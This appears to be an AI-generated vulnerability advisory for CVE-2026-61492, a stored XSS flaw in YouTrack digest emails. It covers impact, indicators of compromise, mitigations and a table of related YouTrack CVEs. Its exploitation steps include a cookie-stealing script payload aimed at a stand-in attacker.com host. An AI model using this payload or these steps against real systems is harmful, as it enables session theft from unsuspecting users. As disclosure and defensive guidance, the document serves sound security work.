CVE-2026-61492
YouTrack vulnerability analysis and mitigation

Overview

CVE-2026-61492 is a stored Cross-Site Scripting (XSS) vulnerability in JetBrains YouTrack that allows injection of malicious JavaScript via article titles included in digest emails. All YouTrack versions before 2026.2.17394 are affected. The vulnerability was published on July 10, 2026, with a patch available in version 2026.2.17394. It carries a CVSS v3.1 base score of 6.1 (Medium) per NVD, though the GitHub Advisory Database rates it as Low (3.5) using a slightly different scoring vector (GitHub Advisory, JetBrains).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). An authenticated user with low privileges can craft a malicious article title containing JavaScript payloads that are not properly sanitized before being rendered in digest email content. When recipients open the digest email in a browser-based email client or web interface, the injected script executes in their browser context. The attack vector is network-based, requires low privileges to inject the payload, and requires user interaction (opening the email) to trigger execution (GitHub Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views a digest email containing the malicious article title. This can result in session token theft, credential harvesting, unauthorized actions performed on behalf of the victim within YouTrack, and limited data exposure. Confidentiality and integrity are both partially impacted, while availability is unaffected (GitHub Advisory).

Exploitation steps

  1. Gain low-privileged access: Authenticate to a vulnerable JetBrains YouTrack instance (version prior to 2026.2.17394) with any user account that has permission to create or edit articles.
  2. Craft malicious article title: Create or edit a YouTrack article and set its title to a payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent XSS string.
  3. Wait for digest email generation: YouTrack periodically sends digest emails to subscribed users summarizing recent activity, including article titles. The malicious title will be embedded unsanitized in the email content.
  4. Victim opens digest email: When a target user opens the digest email in a browser-based email client or webmail interface that renders HTML, the injected script executes in their browser context.
  5. Harvest session data or perform actions: The attacker's script can steal session cookies, authentication tokens, or perform actions within YouTrack on behalf of the victim (GitHub Advisory).

Indicators of compromise

  • Logs: YouTrack application logs showing article creation or edits by low-privileged users with titles containing HTML tags or JavaScript syntax (e.g., <script>, onerror=, javascript:).
  • Network: Outbound HTTP requests from victim browsers to unexpected external domains shortly after digest email delivery, potentially carrying cookie or token data as query parameters.
  • Email Content: Digest emails containing article titles with raw HTML or JavaScript code rather than plain text strings.

Mitigation and workarounds

JetBrains has released a fix in YouTrack version 2026.2.17394. Administrators should upgrade to this version or later as the primary remediation. As a temporary workaround, consider disabling digest email functionality or restricting article creation permissions to trusted users only until the patch can be applied. Additionally, enforcing Content Security Policy (CSP) headers in email clients and webmail interfaces can reduce the risk of XSS execution (JetBrains, GitHub Advisory).

Additional resources


SourceThis report was generated using AI

Related YouTrack vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-57926CRITICAL9.8
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesJun 26, 2026
CVE-2026-61492MEDIUM6.1
  • YouTrack logoYouTrack
  • youtrack
NoYesJul 10, 2026
CVE-2026-57925MEDIUM5.3
  • YouTrack logoYouTrack
  • youtrack
NoYesJun 26, 2026
CVE-2026-57924MEDIUM5.3
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesJun 26, 2026
CVE-2026-59791LOW3.5
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesJul 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management